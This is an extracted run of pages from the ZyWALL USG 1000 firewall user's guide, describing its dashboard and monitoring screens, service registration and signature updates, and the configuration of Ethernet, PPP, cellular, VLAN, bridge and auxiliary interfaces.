Page 215: ...lying the system configuration Licensed Service Status This shows how many licensed services there are Status This is the current status of the license Name This identifies the licensed service Version This is the version number of the anti virus or IDP signatures anti virus and IDP Expiration If the service license is valid this shows when it will expire N A displays if the service license does n...

Page 216: ...y Signature Name It shows the categories of intrusions See Table 156 on page 580 for more information Severity This is the level of threat that the intrusions may pose Occurrence This is how many times the ZyWALL has detected the event described in the entry Table 22 Dashboard continued LABEL DESCRIPTION Table 23 Dashboard CPU Usage LABEL DESCRIPTION The y axis represents the percentage of CPU usa...

Page 217: ...oard Figure 203 Dashboard Memory Usage The following table describes the labels in this screen Table 24 Dashboard Memory Usage LABEL DESCRIPTION The y axis represents the percentage of RAM usage The x axis shows the time period over which the RAM usage occurred Refresh Interval Enter how often you want this window to be automatically updated Refresh Click this to update the information in the wind...

Page 218: ...ard Figure 204 Dashboard Session Usage The following table describes the labels in this screen Table 25 Dashboard Session Usage LABEL DESCRIPTION Sessions The y axis represents the number of session The x axis shows the time period over which the session usage occurred Refresh Interval Enter how often you want this window to be automatically updated Refresh Click this to update the information in ...

Page 219: ...s reserved for specific MAC addresses To access this screen click the icon beside DHCP Table in the dashboard Figure 206 Dashboard DHCP Table Table 26 Dashboard VPN Status LABEL DESCRIPTION This field is a sequential value and it is not associated with a specific SA Name This field displays the name of the IPSec SA Encapsulation This field displays how the IPSec SA is encapsulated Algorithm This f...

Page 220: ... sort order Host Name This field displays the name used to identify this device on the network the computer name The ZyWALL learns these from the DHCP client requests None shows here for a static DHCP entry MAC Address This field displays the MAC address to which the IP address is currently assigned or for which the IP address is reserved Click the column s heading cell to sort the table entries b...

Page 221: ...field displays the user name of each user who is currently logged in to the ZyWALL Reauth Lease T This field displays the amount of reauthentication time remaining and the amount of lease time remaining for each user See Chapter 40 on page 699 Type This field displays the way the user logged in to the ZyWALL IP address This field displays the IP address of the computer used to log in to the ZyWALL...

Page 222: ...Chapter 9 Dashboard ZyWALL USG 1000 User s Guide 222 ...

Page 223: ...m Status Session Monitor screen see Section 10 5 on page 233 to view sessions by user or service Use the System Status DDNS Status screen see Section 10 6 on page 235 to view the status of the ZyWALL s DDNS domain names The System Status IP MAC Binding screen Section 10 7 on page 236 lists the devices that have received an IP address from ZyWALL interfaces with IP MAC binding enabled Use the Syste...

Page 224: ...n page 254 to start or stop data collection and view content filter statistics Use the Anti X Statistics Content Filter Cache screen Section 10 18 on page 255 to view and configure your ZyWALL s URL caching Use the Anti X Statistics Anti Spam screen Section 10 19 on page 258 to start or stop data collection and view spam statistics Use the Anti X Statistics Anti Spam Status screen Section 10 20 on...

Page 225: ... is not connected Speed Duplex The physical port is connected This field displays the port speed and duplex setting Full or Half TxPkts This field displays the number of packets transmitted from the ZyWALL on the physical port since it was last connected RxPkts This field displays the number of packets received by the ZyWALL on the physical port since it was last connected Collisions This field di...

Page 226: ...TION Refresh Interval Enter how often you want this window to be automatically updated Refresh Now Click this to update the information in the window right away Port Selection Select the number of the physical port for which you want to display graphics Switch to Grid View Click this to display the port statistics as a table bps The y axis represents the speed of transmission or reception time The...

Page 227: ...time the information in the window was last updated System Up Time This field displays how long the ZyWALL has been running since it last restarted or was turned on Table 30 Monitor System Status Port Statistics Switch to Graphic View LABEL DESCRIPTION Table 31 Monitor System Status Interface Status LABEL DESCRIPTION Interface Status If an Ethernet interface does not have any physical ports associ...

Page 228: ...nterface is enabled and connected Disconnected The auxiliary interface is not connected For virtual interfaces this field always displays Up If the virtual interface is disabled it does not appear in the list For VLAN and bridge interfaces this field always displays Up If the VLAN or bridge interface is disabled it does not appear in the list For PPP interfaces Connected The PPP interface is conne...

Page 229: ... interface If the interface cannot use one of these ways to get or to update its IP address this field displays n a Interface Statistics This table provides packet statistics for each interface Refresh Click this button to update the information in the screen Expand Close Click this button to show or hide statistics for all the virtual interfaces on top of the Ethernet interfaces Name This field d...

Page 230: ...e cases because the ZyWALL counts HTTP GET packets Please see Table 32 on page 231 for more information Most used protocols or service ports and the amount of traffic on each one LAN IP with heaviest traffic and how much traffic has been sent to and from each one You use the Traffic Statistics screen to tell the ZyWALL when to start and when to stop collecting information for these reports You can...

Page 231: ...fic for each one Web Site Hits displays the most visited Web sites and how many times each one has been visited Each type of report has different information in the report below Refresh Click this button to update the report display Flush Data Click this button to discard all of the screen s statistics and update the report display These fields are available when the Traffic Type is Host IP Addres...

Page 232: ...yed The unit of measure is bytes Kbytes Mbytes Gbytes or Tbytes depending on the amount of traffic for the particular protocol or service port The count starts over at zero if the number of bytes passes the byte count limit See Table 33 on page 232 These fields are available when the Traffic Type is Web Site Hits This field is the rank of each record The domain names are sorted by the number of hi...

Page 233: ... Protocol or service port used Source address Destination address Number of bytes received so far Number of bytes transmitted so far Duration so far You can look at all the active sessions by user service source IP address or destination IP address You can also filter the information by user protocol service or service group source address and or destination address and view it by user Click Monit...

Page 234: ...e part of the user name or use wildcards in this field you must enter the whole user name Service This field displays when View is set to all sessions Select the service or service group whose sessions you want to view The ZyWALL identifies the service by comparing the protocol and destination port of each packet to the protocol and port of each services that is defined See Chapter 42 on page 721 ...

Page 235: ...ys the destination IP address and port in each active session If you are looking at the sessions by destination IP report click or to display or hide details about a destination IP address s sessions Rx This field displays the amount of information received by the source in the active session Tx This field displays the amount of information transmitted by the source in the active session Duration ...

Page 236: ...s the ZyWALL is currently attempting to resolve the IP address for the domain name Last Update Time This shows when the last attempt to resolve the IP address for the domain name occurred in year month day hour minute second format Table 35 Monitor System Status DDNS Status continued LABEL DESCRIPTION Table 36 Monitor System Status IP MAC Binding LABEL DESCRIPTION Interface Select a ZyWALL interfa...

Page 237: ...m Status IP MAC Binding continued LABEL DESCRIPTION Table 37 Monitor System Status Login Users LABEL DESCRIPTION This field is a sequential value and is not associated with any entry User ID This field displays the user name of each user who is currently logged in to the ZyWALL Reauth Lease T This field displays the amount of reauthentication time remaining and the amount of lease time remaining f...

Page 238: ...ellular Status The following table describes the labels in this screen Table 38 Monitor System Status Cellular Status LABEL DESCRIPTION Refresh Click this button to update the information in the screen This field is a sequential value and it is not associated with any interface Extension Slot This field displays where the entry s cellular card is located Connected Device This field displays the mo...

Page 239: ...e is searching for a network Get signal fail The 3G device cannot get a signal from a network Network found The 3G device found a network Apply config The ZyWALL is applying your configuration to the 3G device Inactive The 3G interface is disabled Active The 3G interface is enabled Incorrect device The connected 3G device is not compatible with the ZyWALL Correct device The ZyWALL detected a compa...

Page 240: ...een your ZyWALL and the service provider s base station More Info This field displays other details about the 3G connection Table 38 Monitor System Status Cellular Status continued LABEL DESCRIPTION Table 39 Monitor System Status USB Storage LABEL DESCRIPTION Device description This is a basic description of the type of USB device Usage This field displays how much of the USB storage device s capa...

Page 241: ...cted USB storage device was manually unmounted by using the Remove Now button or for some reason the ZyWALL cannot mount it Click Use It to have the ZyWALL mount a connected USB storage device none no USB storage device is connected Detail This field displays any other information the ZyWALL retrieves from the USB storage device Deactivated the use of a USB storage device is disabled turned off on...

Page 242: ...usage This is the protocol s traffic that the ZyWALL sends to the initiator of the connection A dotted line represents a protocol s outgoing bandwidth usage This is the protocol s traffic that the ZyWALL sends out from the initiator of the connection Different colors represent different protocols Table 40 Monitor AppPatrol Statistics General Settings LABEL DESCRIPTION Refresh Interval Select how o...

Page 243: ... application s traffic the ZyWALL has sent in kilobytes Dropped Data KB This is how much of the application s traffic the ZyWALL has discarded without notifying the client in kilobytes This traffic was dropped because it matched an application policy set to drop Rejected Data KB This is how much of the application s traffic the ZyWALL has discarded and notified the client that the traffic was reje...

Page 244: ...und traffic Outbound Kbps This is the outgoing bandwidth usage for traffic that matched this protocol rule in kilobits per second This is the protocol s traffic that the ZyWALL sends out from the initiator of the connection So for a connection initiated from the LAN to the WAN the traffic sent from the LAN to the WAN is the outbound traffic Forwarded Data KB This is how much of the application s t...

Page 245: ...ction initiated from the LAN to the WAN the traffic sent from the WAN to the LAN is the inbound traffic Outbound Kbps This is the outgoing bandwidth usage for traffic that matched this protocol rule in kilobits per second This is the protocol s traffic that the ZyWALL sends out from the initiator of the connection So for a connection initiated from the LAN to the WAN the traffic sent from the LAN ...

Page 246: ...licies for an IPSec SA and click Search to find it You can use a keyword or regular expression Use up to 30 alphanumeric and _ characters See Section 10 12 1 on page 247 for more details Search Click this button to search for an IPSec SA that matches the information you specified above Disconnect Select an IPSec SA and click this button to disconnect it Total Connection This field displays the tot...

Page 247: ...le VPN connection or policy name has to match if you do not use a question mark or asterisk Encapsulation This field displays how the IPSec SA is encapsulated Policy This field displays the content of the local and remote policies for this IPSec SA The IP addresses not the address objects are displayed Algorithm This field displays the encryption and authentication algorithms used in the SA Up Tim...

Page 248: ...L LABEL DESCRIPTION Disconnect Select a connection and click this button to terminate the user s connection and delete corresponding session information from the ZyWALL This field displays the index number User This field displays the account user name used to establish this SSL VPN connection Access This field displays the name of the SSL VPN application the user is accessing Login Address This f...

Page 249: ...onitor L2TP over IPSec LABEL DESCRIPTION Disconnect Select a connection and click this button to disconnect it This is the index number of a current L2TP VPN session User Name This field displays the remote user s user name Hostname This field displays the name of the computer that has this L2TP VPN connection with the ZyWALL Assigned IP This field displays the IP address that the ZyWALL assigned ...

Page 250: ...s in this screen are for the time period starting at the time displayed here The format is year month day and hour minute second All of the statistics are erased if you restart the ZyWALL or click Flush Data Collecting starts over and a new collection start time displays Apply Click Apply to save your changes back to the ZyWALL Reset Click Reset to return the screen to its last saved settings Refr...

Page 251: ... the most virus infected files Select Destination IP to list the most common destination IP addresses for virus infected files that ZyWALL has detected This field displays the entry s rank in the list of the top entries Virus name This column displays when you display the entries by Virus Name This displays the name of a detected virus Source IP This column displays when you display the entries by...

Page 252: ...ute second All of the statistics are erased if you restart the ZyWALL or click Flush Data Collecting starts over and a new collection start time displays Apply Click Apply to save your changes back to the ZyWALL Reset Click Reset to return the screen to its last saved settings Refresh Click this button to update the report display Flush Data Click this button to discard all of the screen s statist...

Page 253: ... top entries Signature Name This column displays when you display the entries by Signature Name The signature name identifies a specific intrusion pattern Click the hyperlink for more detailed information on the intrusion Type This column displays when you display the entries by Signature Name It shows the categories of intrusions See Table 156 on page 580 for more information Severity This column...

Page 254: ...displays after you click Apply All of the statistics in this screen are for the time period starting at the time displayed here The format is year month day and hour minute second All of the statistics are erased if you restart the ZyWALL or click Flush Data Collecting starts over and a new collection start time displays Apply Click Apply to save your changes back to the ZyWALL Reset Click Reset t...

Page 255: ...ration Restricted Web Features This is the number of web pages to which the ZyWALL did not allow access due to the content filtering custom service s restricted web features configuration Forbidden Web Sites This is the number of web pages to which the ZyWALL did not allow access because they matched the content filtering custom service s forbidden web sites list URL Keywords This is the number of...

Page 256: ...s by that column s criteria Click the heading cell again to reverse the sort order Figure 232 Anti X Content Filter Cache The following table describes the labels in this screen Table 49 Anti X Content Filter Cache LABEL DESCRIPTION URL Cache Entry Refresh Click this button to reload the list of content filter cache entries Flush Click this button to clear all web site addresses from the cache man...

Page 257: ...tes left before the URL entry is discarded from the cache URL Cache Setup Maximum TTL Type the maximum time to live TTL 1 to 720 hours This sets how long the ZyWALL is to keep an entry in the URL cache before discarding it The external content filtering database frequently adds previously un categorized web sites and sometimes changes a web site s category Setting this limit higher will speed up t...

Page 258: ...his screen are for the time period starting at the time displayed here The format is year month day and hour minute second All of the statistics are erased if you restart the ZyWALL or click Flush Data Collecting starts over and a new collection start time displays Apply Click Apply to save your changes back to the ZyWALL Reset Click Reset to return the screen to its last saved settings Refresh Cl...

Page 259: ...threshold Mail Sessions Dropped This is how many e mail sessions the ZyWALL dropped because they exceeded the maximum number of e mail sessions that the anti spam feature can check at a time You can see the ZyWALL s threshold of concurrent e mail sessions in the Anti Spam Status screen Use the Anti Spam General screen to set whether the ZyWALL forwards or drops sessions that exceed this threshold ...

Page 260: ...The lighter shaded part of the bar and the pop up show the historical high The first number to the right of the bar is how many e mail sessions the ZyWALL is presently checking for spam The second number is the maximum number of e mail sessions that the ZyWALL can check at once An e mail session is when an e mail client and e mail server or two e mail servers connect through the ZyWALL DNSBL Stati...

Page 261: ...ess this screen click Monitor Log The log is displayed in the following screen Note When a log reaches the maximum number of log messages new log messages automatically overwrite existing log messages starting with the oldest existing log message first For individual log descriptions see Appendix A on page 917 For the maximum number of log messages in the ZyWALL see Chapter 57 on page 909 Events t...

Page 262: ...Interface This displays when you show the filter Select the source interface of the packet that generated the log message Destination Interface This displays when you show the filter Select the destination interface of the packet that generated the log message Service This displays when you show the filter Select the service whose log messages you would like to see The Web Configurator uses the pr...

Page 263: ... displays the reason the log message was generated The text count x where x is a number appears at the end of the Message field if log consolidation is turned on see Log Consolidation in Table 248 on page 851 and multiple entries were aggregated to generate into this one Source This field displays the source IP address and the port number in the event that generated the log message Destination Thi...

Page 264: ...Chapter 10 Monitor ZyWALL USG 1000 User s Guide 264 ...

Page 265: ...L com myZyXEL com is ZyXEL s online services center where you can register your ZyWALL and manage subscription services available for the ZyWALL To update signature files or use a subscription service you have to register the ZyWALL and activate the corresponding service at myZyXEL com through the ZyWALL Note You need to create a myZyXEL com account before you can register your device and activate...

Page 266: ...not a separate trial period for each anti virus engine After the trial expires you need to purchase an iCard for the anti virus engine you want to use and enter the PIN number license key in the Registration Service screen You must use the ZyXEL anti virus iCard for the ZyXEL anti virus engine and the Kaspersky anti virus iCard for the Kaspersky anti virus engine If you were already using an iCard...

Page 267: ...lds are available new myZyXEL com account If you haven t created an account at myZyXEL com select this option and configure the following fields to create an account and register your ZyWALL existing myZyXEL com account If you already have an account at myZyXEL com select this option and enter your user name and password in the fields below to register your ZyWALL UserName Enter a user name for yo...

Page 268: ...e from the update server http myupdate zywall zyxel com IDP AppPatrol Signature Service The IDP and application patrol features use the IDP AppPatrol signature files on the ZyWALL IDP detects malicious or suspicious packets and responds immediately Application patrol conveniently manages the use of various applications on the network After the service is activated the ZyWALL can download the up to...

Page 269: ...o update your service subscription status Figure 237 Configuration Licensing Registration Registered Device 11 3 The Service Screen Use this screen to display the status of your service registrations and upgrade licenses To activate or extend a standard service subscription purchase an iCard and enter the iCard s PIN number license key in this screen Click Configuration Licensing Registration Serv...

Page 270: ...nti virus service subscription this field also displays the type of anti virus engine Expiration date This field displays the date your service expires You can continue to use IDP AppPatrol or Anti Virus after the registration expires you just won t receive updated signatures Count This field displays how many VPN tunnels you can use with your current license This field does not apply to the other...

Page 271: ...on page 569 for details on IDP See Chapter 32 on page 527 for details on application patrol Use the Configuration Licensing Update System Protect screen Section 12 4 on page 275 to update the system protection signatures 12 1 2 What you Need to Know You need a valid service registration to update the anti virus signatures and the IDP AppPatrol signatures You do not need a service registration to u...

Page 272: ...ersion 2 11 and updating the anti virus signatures automatically upgrades the ZyXEL anti virus engine to v2 0 v2 0 has more virus signatures and offers improved non executable file scan throughput Current Version This field displays the anti virus signatures version number currently used by the ZyWALL This number is defined by the ZyXEL Security Response Team ZSRT who maintain and update them This...

Page 273: ...are found they are then downloaded to the ZyWALL Update Now Click this button to have the ZyWALL check for new signatures immediately If there are new ones the ZyWALL will then download them Auto Update Select this check box to have the ZyWALL automatically check for new signatures regularly at the time and day specified You should select a time when your network is not busy for minimal interrupti...

Page 274: ...umber of IDP signatures in this set This number usually gets larger as the set is enhanced Older signatures and rules may be removed if they are no longer applicable or have been supplanted by newer ones Released Date This field displays the date and time the set was released Signature Update Use these fields to have the ZyWALL check for new IDP signatures at myZyXEL com If new signatures are foun...

Page 275: ...ystem protection feature is enabled by default and can only be disabled via the commands You do not need an IDP subscription to use the system protection feature or to download updated system protection signatures Figure 241 Configuration Licensing Update System Protect Daily Select this option to have the ZyWALL check for new IDP signatures everyday at the specified time The time format is the 24...

Page 276: ... these fields to have the ZyWALL check for new signatures at myZyXEL com If new signatures are found they are then downloaded to the ZyWALL Update Now Click this button to have the ZyWALL check for new signatures immediately If there are new ones the ZyWALL will then download them Auto Update Select this check box to have the ZyWALL automatically check for new signatures regularly at the time and ...

Page 277: ...icies RIP and OSPF are also configured in these interfaces Use the PPP screens Section 13 4 on page 292 for PPPoE or PPTP Internet connections Use the Cellular screens Section 13 5 on page 299 to configure settings for interfaces for Internet connections through an installed 3G card Use the VLAN screens Section 13 6 on page 308 to divide the physical network into multiple logical networks VLAN int...

Page 278: ...ne Ethernet interface Bridge interfaces create a software connection between Ethernet or VLAN interfaces at the layer 2 data link MAC address level Unlike port groups bridge interfaces can take advantage of some security features in the ZyWALL You can also assign an IP address and subnet mask to the bridge PPP interfaces support Point to Point Protocols PPP ISP accounts are required for PPPoE PPTP...

Page 279: ... interface Relationships Between Interfaces In the ZyWALL interfaces are usually created on top of other interfaces Only Ethernet interfaces are created directly on top of the physical ports or port groups The relationships between interfaces are explained in the following table Table 57 Ethernet PPP Cellular VLAN Bridge and Virtual Interface Characteristics CHARACTERISTICS ETHERNET PPP CELLULAR V...

Page 280: ...information on interfaces See Section 7 1 on page 117 for an example of configuring Ethernet interfaces port grouping and zones See Section 7 2 on page 120 for an example of configuring a cellular 3G interface See Chapter 14 on page 337 to configure load balancing using trunks 13 2 Port Grouping This section introduces port groups and then explains the screen for port groups PPP interface Ethernet...

Page 281: ...to a representative interface you create a port group Port groups have the following characteristics There is a layer 2 Ethernet switch between physical ports in the port group This provides wire speed throughput but no security It can increase the bandwidth between the port group and other interfaces 13 2 2 Port Grouping Screen Define the relationship between physical ports port groups and Ethern...

Page 282: ...ts exchange routing information with other routers and how much information is exchanged through each one The more routing information is exchanged the more efficient the routers should be However the routers also generate more network traffic and some routing protocols require a significant amount of configuration and management The ZyWALL supports two routing protocols RIP and OSPF See Chapter 1...

Page 283: ...click Create Virtual Interface Object References Select an entry and click Object References to open a screen that shows which settings use the entry See Section 13 3 2 on page 291 for an example This field is a sequential value and it is not associated with any interface Status This icon is lit when the entry is active and dimmed when the entry is inactive Name This field displays the name of the...

Page 284: ... interfaces to do the following things Enable and disable RIP in the underlying physical port or port group Select which direction s routing information is exchanged The ZyWALL can receive routing information send routing information or do both Select which version of RIP to support in each direction The ZyWALL supports RIP 1 RIP 2 and both versions Select the broadcasting method used by RIP 2 pac...

Page 285: ...Chapter 13 Interfaces ZyWALL USG 1000 User s Guide 285 Figure 244 Configuration Network Interface Ethernet Edit ...

Page 286: ...ou must manually configure a policy route to add routing and SNAT settings for the interface Interface Name Specify a name for the interface It can use alphanumeric characters hyphens and underscores and it can be up to 11 characters long Port This is the name of the Ethernet interface s physical port Zone Select the zone to which this interface is to belong You use zones to apply security setting...

Page 287: ...lowed values are 0 1048576 Ingress Bandwidth This is reserved for future use Enter the maximum amount of traffic in kilobits per second the ZyWALL can receive from the network through the interface Allowed values are 0 1048576 MTU Maximum Transmission Unit Type the maximum size of each data packet in bytes that can move through this interface If a larger packet arrives the ZyWALL divides it into s...

Page 288: ...ere is already a DHCP server on the network DHCP Relay the ZyWALL routes DHCP requests to one or more DHCP servers you specify The DHCP server s may be on another network DHCP Server the ZyWALL assigns IP addresses and provides subnet mask gateway and DNS server information to the network The ZyWALL is the DHCP server for the network These fields appear if the ZyWALL is a DHCP Relay Relay Server 1...

Page 289: ...the computer names on your network and the IP addresses that they are currently using Lease time Specify how long each computer can use the information especially the IP address before it has to request the information again Choices are infinite select this if IP addresses never expire days hours and minutes select this to enter how long IP addresses are valid Enable IP MAC Binding Select this opt...

Page 290: ...packets using subnet broadcasting otherwise the ZyWALL uses multicasting OSPF Setting See Section 16 3 on page 365 for more information about OSPF Area Select the area in which this interface belongs Select None to disable OSPF in this interface Priority Enter the priority between 0 and 255 of this interface when the area is looking for a Designated Router DR or Backup Designated Router BDR The hi...

Page 291: ...ry assigned default MAC address By default the ZyWALL uses the factory assigned MAC address to identify itself Overwrite Default MAC Address Select this option to have the interface use a different MAC address Either enter the MAC address in the fields or click Clone by host and enter the IP address of the device or computer whose MAC you are cloning Once it is successfully configured the address ...

Page 292: ... display the object s configuration screen in the main window This field is a sequential value and it is not associated with any entry Service This is the type of setting that references the selected object Click a service s name to display the service s configuration screen in the main window Priority If it is applicable this field lists the referencing configuration item s position in its list o...

Page 293: ...the protocol PPPoE or PPTP as well as your ISP account information If you change ISPs later you only have to create a new ISP account not a new PPPoE PPTP interface You should not have to change any network policies You do not set up the subnet mask or gateway PPPoE PPTP interfaces are interfaces between the ZyWALL and only one computer Therefore the subnet mask is always 255 255 255 255 In additi...

Page 294: ... it before doing so Activate To turn on an entry select it and click Activate Inactivate To turn off an entry select it and click Inactivate Connect To connect an interface select it and click Connect You might use this in testing the interface or to manually establish the connection for a Dial on Demand PPPoE PPTP interface Disconnect To disconnect an interface select it and click Disconnect You ...

Page 295: ...an Edit icon in the PPP Interface screen Name This field displays the name of the interface Base Interface This field displays the interface on the top of which the PPPoE PPTP interface is Account Profile This field displays the ISP account used by this PPPoE PPTP interface Apply Click Apply to save your changes back to the ZyWALL Reset Click Reset to return the screen to its last saved settings T...

Page 296: ... Network Interface PPP Add Each field is explained in the following table Table 64 Configuration Network Interface PPP Add LABEL DESCRIPTION Show Advance Settings Hide Advance Settings Click this button to display a greater or lesser number of configuration fields General Settings ...

Page 297: ...nection available ISP Setting Account Profile Select the ISP account that this PPPoE PPTP interface uses The drop down box lists ISP accounts by name Use Create new Object if you need to configure a new ISP account see Chapter 47 on page 771 for details Protocol This field is read only It displays the protocol specified in the ISP account User Name This field is read only It displays the user name...

Page 298: ...ect this to turn on the connection check Check Method Select the method that the gateway allows Select icmp to have the ZyWALL regularly ping the gateway you specify to make sure it is still available Select tcp to have the ZyWALL regularly perform a TCP handshake with the gateway you specify to make sure it is still available Check Period Enter the number of seconds between connection check attem...

Page 299: ...o users when they send data It allows fast transfer of voice and non voice data and provides broadband Internet access to mobile devices Note The actual data rate you obtain varies depending on the 3G card you use the signal strength to the service provider s base station and so on OK Click OK to save your changes back to the ZyWALL Cancel Click Cancel to exit this screen without saving Table 64 C...

Page 300: ...a hybrid 2 5G 3G protocol of mobile telecommunications standards that use CDMA a multiple access scheme for digital radio CDMA2000 1xRTT 1 times Radio Transmission Technology is the core CDMA2000 wireless air interface standard It is also known as 1x 1xRTT or IS 2000 and considered to be a 2 5G or 2 75G technology 2 75G Packet switched Enhanced Data rates for GSM Evolution EDGE Enhanced GPRS EGPRS...

Page 301: ...select it and click Connect You might use this in testing the interface or to manually establish the connection Disconnect To disconnect an interface select it and click Disconnect You might use this in testing the interface Object References Select an entry and click Object References to open a screen that shows which settings use the entry See Section 13 3 2 on page 291 for an example This field...

Page 302: ...Chapter 13 Interfaces ZyWALL USG 1000 User s Guide 302 Figure 250 Configuration Network Interface Cellular Add ...

Page 303: ...y Nailed Up Select this if the connection should always be up Clear this to have the ZyWALL to establish the connection only when there is traffic You might not nail up the connection if there is little traffic through the interface or if it costs money to keep the connection available Idle timeout This value specifies the time in seconds 0 360 that elapses before the ZyWALL automatically disconne...

Page 304: ...es are not allowed Password This field displays when you select an authentication type other than None This field is read only if you selected Device in the profile selection and the password is included in the 3G card s profile If this field is configurable enter the password for this SIM card exactly as the service provider gave it to you You can use 0 63 alphanumeric and _ characters Spaces are...

Page 305: ...n on the connection check Check Method Select the method that the gateway allows Select icmp to have the ZyWALL regularly ping the gateway you specify to make sure it is still available Select tcp to have the ZyWALL regularly perform a TCP handshake with the gateway you specify to make sure it is still available Check Period Enter the number of seconds between connection check attempts Check Timeo...

Page 306: ...fy the type of network to use if you are charged differently for different types of network or you only have one type of network available to you Select GPRS EDGE GSM only to have this interface only use a 2 5G or 2 75G network respectively If you only have a GSM network available to you you may want to select this so the ZyWALL does not spend time looking for a WCDMA network Select UMTS HSDPA WCD...

Page 307: ... time or data limit is exceeded Log Select None to not create a log Log to create a log or Log alert to create an alert log If you select Log or Log alert you can also select recurring every to have the ZyWALL send a log or alert for this event periodically Specify how often from 1 to 65535 minutes to send the log or alert New 3G connection Select Allow to permit new 3G connections or Disallow to ...

Page 308: ...mple there are two physical networks and three departments A B and C The physical networks are connected to hubs and the hubs are connected to the router Alternatively you can divide the physical networks into three VLANs Figure 252 Example After VLAN OK Click OK to save your changes back to the ZyWALL Cancel Click Cancel to exit this screen without saving Table 67 Configuration Network Interface ...

Page 309: ...rs Higher security If each computer has a separate physical connection to the switch then broadcast traffic in each VLAN is never sent to computers in another VLAN Better manageability You can align network policies more appropriately for users For example you can create different content filtering rules for each VLAN each department in the example above and you can set different bandwidth limits ...

Page 310: ...ick Remove The ZyWALL confirms you want to remove it before doing so Activate To turn on an entry select it and click Activate Inactivate To turn off an entry select it and click Inactivate Create Virtual Interface To open the screen where you can create a virtual interface select an interface and click Create Virtual Interface Object References Select an entry and click Object References to open ...

Page 311: ... appears IP Address This field displays the current IP address of the interface If the IP address is 0 0 0 0 the interface does not have an IP address yet This screen also shows whether the IP address is a static IP address STATIC or dynamically assigned DHCP IP addresses are always static in virtual interfaces Mask This field displays the interface s subnet mask in dot decimal notation Apply Clic...

Page 312: ...Chapter 13 Interfaces ZyWALL USG 1000 User s Guide 312 Figure 254 Configuration Network Interface VLAN Edit ...

Page 313: ...4095 are reserved Description Enter a description of this interface It is not used elsewhere You can use alphanumeric and _ characters and it can be up to 60 characters long IP Address Assignment Get Automatically Select this if this interface is a DHCP client In this case the DHCP server configures the IP address subnet mask and gateway automatically You should not select this if the interface is...

Page 314: ...a failure and how many consecutive failures are required before the ZyWALL stops routing to the gateway The ZyWALL resumes routing to the gateway the first time the gateway passes the connectivity check Enable Connectivity Check Select this to turn on the connection check Check Method Select the method that the gateway allows Select icmp to have the ZyWALL regularly ping the gateway you specify to...

Page 315: ...ress broadcast address and the interface s IP address Pool Size Enter the number of IP addresses to allocate This number must be at least one and is limited by the interface s Subnet Mask For example if the Subnet Mask is 255 255 255 0 and IP Pool Start Address is 10 10 10 10 the ZyWALL can allocate 10 10 10 10 to 10 10 10 254 or 245 IP addresses If this field is blank the IP Pool Start Address mu...

Page 316: ... able to modify it Remove Select an entry and click this to delete it This field is a sequential value and it is not associated with a specific entry IP Address Enter the IP address to assign to a device with this entry s MAC address MAC Address Enter the MAC address to which to assign this entry s IP address Description Enter a description to help identify this static DHCP entry You can use alpha...

Page 317: ...method in the area None disable authentication Text authenticate OSPF routing information using a plain text password MD5 authenticate OSPF routing information using MD5 encryption Text Authentication Key This field is available if the Authentication is Text Type the password for text authentication The key can consist of alphanumeric characters and the underscore and it can be up to eight charact...

Page 318: ... table It also looks up the destination MAC address in the table If the bridge knows on which port the destination MAC address is located it sends the packet to that port If the destination MAC address is not in the table the bridge broadcasts the packet on every port except the one on which it was received In the example above computer A sends a packet to computer B Bridge X records the source ad...

Page 319: ...aces Any number of Ethernet interfaces and any associated virtual Ethernet interfaces When you create a bridge interface the ZyWALL removes the members entries from the routing table and adds the bridge interface s entries to the routing table For example this table shows the routing table before and after you create bridge interface br0 250 250 250 0 23 between ge1 and vlan1 In this example virtu...

Page 320: ... where you can create a virtual interface select an interface and click Create Virtual Interface Object References Select an entry and click Object References to open a screen that shows which settings use the entry See Section 13 3 2 on page 291 for an example This field is a sequential value and it is not associated with any interface Status This icon is lit when the entry is active and dimmed w...

Page 321: ...nfigure IP address assignment interface bandwidth parameters DHCP settings and connectivity check for each bridge interface To access this screen click the Add icon at the top of the Add column in the Bridge Summary screen or click an Edit icon in the Bridge Summary screen The following screen appears ...

Page 322: ...Chapter 13 Interfaces ZyWALL USG 1000 User s Guide 322 Figure 256 Configuration Network Interface Bridge Add ...

Page 323: ...f the bridge interface An interface is not available in the following situations There is a virtual interface on top of it It is already used in a different bridge interface Select one and click the arrow to add it to the bridge interface Each bridge interface can only have one VLAN interface Member This field displays the interfaces that are part of the bridge interface Select one and click the a...

Page 324: ...6 Ingress Bandwidth This is reserved for future use Enter the maximum amount of traffic in kilobits per second the ZyWALL can receive from the network through the interface Allowed values are 0 1048576 MTU Maximum Transmission Unit Type the maximum size of each data packet in bytes that can move through this interface If a larger packet arrives the ZyWALL divides it into smaller fragments Allowed ...

Page 325: ...that another interface received from its DHCP server ZyWALL the DHCP clients use the IP address of this interface and the ZyWALL works as a DNS relay First WINS Server Second WINS Server Type the IP address of the WINS Windows Internet Naming Service server that you want to send to the DHCP clients The WINS server keeps a mapping table of the computer names on your network and the IP addresses tha...

Page 326: ...onnectivity check Enable Connectivity Check Select this to turn on the connection check Check Method Select the method that the gateway allows Select icmp to have the ZyWALL regularly ping the gateway you specify to make sure it is still available Select tcp to have the ZyWALL regularly perform a TCP handshake with the gateway you specify to make sure it is still available Check Period Enter the n...

Page 327: ... use the auxiliary interface Note You have to connect an external modem to the auxiliary port The ZyWALL uses the auxiliary interface to dial out in two situations 1 You click the Connect icon on the ZyWALL Status screen 2 The load auxiliary interface must connect to satisfy load balancing requirements You have to add the auxiliary interface to a trunk first When the ZyWALL hangs up the call it dr...

Page 328: ... is read only and displays the zone to which the auxiliary interface belongs Description Enter a description of this interface It is not used elsewhere You can use alphanumeric and _ characters and it can be up to 60 characters long Port Speed Select the speed of the connection between the ZyWALL and external computer Dialing Type Tone select this if the telephone uses tone based dialing Pulse sel...

Page 329: ... comma to pause during dialing Use a plus sign to tell the external modem to make an international call User Name Enter the user name required for authentication Password Enter the password required for authentication Retype to confirm Enter the password again to make sure you have not typed it incorrectly Authentication Type Select the authentication protocol to use for outgoing calls Choices are...

Page 330: ...ration Network Interface Add LABEL DESCRIPTION Interface Properties Interface Name This field is read only It displays the name of the virtual interface which is automatically derived from the underlying Ethernet interface VLAN interface or bridge interface Description Enter a description of this interface It is not used elsewhere You can use alphanumeric and _ characters and it can be up to 60 ch...

Page 331: ...ways have the same priority the ZyWALL uses the one that was configured first Interface Parameters Egress Bandwidth Enter the maximum amount of traffic in kilobits per second the ZyWALL can send through the interface to the network Allowed values are 0 1048576 Ingress Bandwidth This is reserved for future use Enter the maximum amount of traffic in kilobits per second the ZyWALL can receive from th...

